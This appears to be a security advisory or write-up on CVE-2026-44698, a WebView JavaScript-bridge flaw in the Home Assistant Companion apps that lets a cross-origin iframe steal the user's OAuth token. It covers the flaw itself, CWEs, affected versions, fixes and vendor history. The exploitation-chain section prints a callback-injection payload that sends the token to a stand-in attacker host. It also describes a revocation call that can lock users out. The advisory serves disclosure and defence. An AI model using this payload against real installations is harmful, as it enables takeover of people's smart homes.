Introduction
A dual flaw in the Home Assistant Companion apps for Android and iOS allows a cross-origin iframe rendered inside the app's WebView to steal the signed-in user's OAuth 2.0 access token, granting full API control over a smart home instance including locks, cameras, and climate systems. With Home Assistant running in more than 2 million households and ranked as the second most active open source project on GitHub, the blast radius of CVE-2026-44698 (CVSS 8.3) extends well beyond a typical mobile app vulnerability.
Home Assistant is an open source home automation platform that prioritizes local control and privacy. It supports over 3,000 device brands and has 21,000 contributors in a single year, making it one of the most significant open source projects in the IoT ecosystem. The Companion apps for Android and iOS serve as the primary mobile interface, using a WebView to render the Home Assistant frontend and a native JavaScript bridge to handle authentication.
Technical Information
CVE-2026-44698 is a cross-origin iframe access token exfiltration vulnerability caused by callback injection into the WebView JavaScript bridge exposed by the Home Assistant Companion apps. The vulnerability requires two distinct design flaws to work together, and neither flaw alone achieves the full impact.
Flaw 1: JavaScript Bridge Exposed to All Frames
The Companion apps expose a JavaScript bridge to the in-app WebView for authentication purposes. The platform specific implementations differ but share the same fundamental weakness:
Android: The bridge object window.externalApp is injected via addJavascriptInterface() into the JavaScript global scope of every frame, including cross-origin iframes. The addJavascriptInterface API on Android does not provide a built-in mechanism to restrict injection to the main frame only.
iOS: The bridge is exposed through webkit.messageHandlers.getExternalAuth (alongside revokeExternalAuth and externalBus). The SafeScriptMessageHandler implementation did not check WKFrameInfo.isMainFrame to restrict access to only the main frame.
The consequence is that any cross-origin iframe rendered within the Companion app's WebView can invoke the bridge methods. This violates the same-origin policy boundary that the bridge implicitly assumed would protect it.
Flaw 2: Unsanitized Callback Identifier Interpolation
The callback field of the JSON payload passed to getExternalAuth (and revokeExternalAuth) was unsanitized and interpolated verbatim into a JavaScript string of the form:
<callback>(true, <auth-json>)
This string was then passed to WebView.evaluateJavascript() on Android and WKWebView.evaluateJavaScript(_:) on iOS. Both of these evaluation functions always execute JavaScript in the main frame's JavaScript context, regardless of which frame initiated the call. This is the critical detail: even though the call originates from a cross-origin iframe, the resulting JavaScript executes with the privileges and origin of the Home Assistant frontend's main frame.
Combined Exploitation Chain
An attacker exploits both flaws together by supplying an IIFE (Immediately Invoked Function Expression) as the callback value. The attack flow proceeds as follows:
- The attacker creates a malicious web page hosted on a domain they control.
- This page is loaded as a cross-origin iframe inside the Home Assistant dashboard, most realistically via the built-in Webpage card, which renders an arbitrary URL as a cross-origin
<iframe>. - From within the iframe, the attacker's JavaScript invokes the bridge method
getExternalAuthwith a crafted callback value such as(function(auth){fetch('https://attacker.com/?token='+auth.token)}). - The Companion app interpolates this unsanitized callback into the JavaScript string, producing something like:
(function(auth){fetch('https://attacker.com/?token='+auth.token)})(true, <auth-json>). - This string is evaluated via
evaluateJavascript()/evaluateJavaScript()in the main frame's context, executing the attacker's code with access to the Home Assistant frontend's origin. - The signed-in user's access token is passed as a function argument and exfiltrated to the attacker's server.
Impact
The exfiltrated access token is a standard OAuth 2.0 bearer token that grants full REST API access. This includes service call capability, read access to entity states, and management of automations, scripts, and users for the token's lifetime. In a smart home context, an attacker could unlock doors, disable security cameras, manipulate climate controls, or extract sensitive household data.
Beyond token theft, the revokeExternalAuth bridge endpoint is also exposed to cross-origin iframes. An attacker can invoke this to revoke the victim's refresh token and delete the server entry from the app, effectively locking the user out of their own Home Assistant instance through the companion app.
CWE Classification
The vulnerability is classified under four CWEs, reflecting its compound nature:
| CWE ID | CWE Name | Relevance |
|---|---|---|
| CWE-94 | Improper Control of Generation of Code (Code Injection) | The unsanitized callback identifier is interpolated into JavaScript and evaluated |
| CWE-346 | Origin Validation Error | The bridge does not validate that the calling frame shares the same origin as the main frame |
| CWE-749 | Exposed Dangerous Method or Function | The bridge methods expose sensitive authentication operations to all frames |
| CWE-940 | Improper Verification of Source of a Communication Channel | Neither the iOS SafeScriptMessageHandler nor Android addJavascriptInterface verifies the source frame |
Platform Specific Fix Differences
The contrast between the Android fix version (2026.4.4) and the iOS fix version (2026.4.1) reflects platform specific implementation differences. On Android, addJavascriptInterface injects the bridge object into every frame's global scope by design, requiring a fundamentally different approach to restrict access. On iOS, the WKScriptMessageHandler protocol provides WKFrameInfo for origin checking, but the SafeScriptMessageHandler wrapper failed to use it. Both platforms shared the callback sanitization flaw.
Affected Systems and Versions
The following Home Assistant Companion app versions are affected:
- iOS: All versions prior to 2026.4.1
- Android: All versions prior to 2026.4.4
The vulnerability is exploitable when the Companion app renders a dashboard containing a Webpage card (or any other mechanism that loads a cross-origin iframe) pointing to an attacker controlled URL. The Home Assistant Core server version is not directly affected; the vulnerability resides entirely in the mobile Companion app's WebView bridge implementation.
Vendor Security History
Home Assistant has accumulated 21 CVEs tracked by OpenCVE, spanning from 2017 through 2026. The distribution includes one CVE for 2025, none for 2024, 11 for 2023, and one for 2017, with multiple new entries in 2026.
Notable historical vulnerabilities include:
| CVE ID | Severity | Description |
|---|---|---|
| CVE-2026-34205 | 9.7 Critical | Apps with host network mode expose unauthenticated endpoints on the internal Docker bridge |
| CVE-2021-47942 | 7.5 High | Path traversal in HACS allowing unauthenticated file read and JWT token forgery |
| CVE-2026-40602 | 5.6 Medium | Unsandboxed Jinja2 template in hass-cli allowing access to Python internals |
| CVE-2026-33044 | 5.4 Medium | XSS via malicious device entity name on Map card |
| CVE-2025-62172 | N/A | Stored XSS in energy dashboard entity names |
Home Assistant Green was explicitly targeted at Pwn2Own Ireland 2025, where the Summoning Team (McCaulay Hudson) successfully exploited it with four separate zero day flaws on Day One of the competition. Pwn2Own inclusion signals that security researchers consider Home Assistant a valuable and achievable target. Following Pwn2Own events, vendors are given 90 days to release security updates before the flaws are publicly disclosed by Trend Micro's Zero Day Initiative.
The project maintains a formal security policy with responsible disclosure requirements and a 90 day patch window. Home Assistant does not offer monetary bounties but credits discoverers publicly. The 2023 supervisor security disclosure was handled with a public blog post, detailed FAQ, and credit to the discoverer.
The addJavascriptInterface mechanism on Android has a well documented history of security issues beyond Home Assistant, including a widely known remote code execution vulnerability affecting Android versions prior to 4.2. This class of WebView native bridge vulnerability is a known weak point in mobile app architecture, and Android's own developer documentation explicitly warns about the risks of insecure WebView native bridges.
References
- NVD: CVE-2026-44698
- GitHub Security Advisory: GHSA-7jp2-p2fw-mgvf (Cross-origin iframe access token exfiltration via WebView JS Bridge)
- Home Assistant Security Policy
- Home Assistant Companion Docs
- Home-assistant CVEs and Security Vulnerabilities on OpenCVE
- CISA Known Exploited Vulnerabilities Catalog
- GitHub Blog: "The local-first rebellion": How Home Assistant became the most important project in your house
- Zero Day Initiative: Pwn2Own Ireland 2025 Day One Results
- VulnCheck State of Exploitation 2026
- WithSecure Labs: WebView addJavascriptInterface Remote Code Execution
- Android Developer Docs: WebView Native Bridges Security
- Zellic: You're Probably Using WebViews Wrong
- Home Assistant Android Releases
- Home Assistant iOS Releases
- Home Assistant Supervisor Security Disclosure (2023)
- Home Assistant Community: List of vulnerabilities (CVEs)



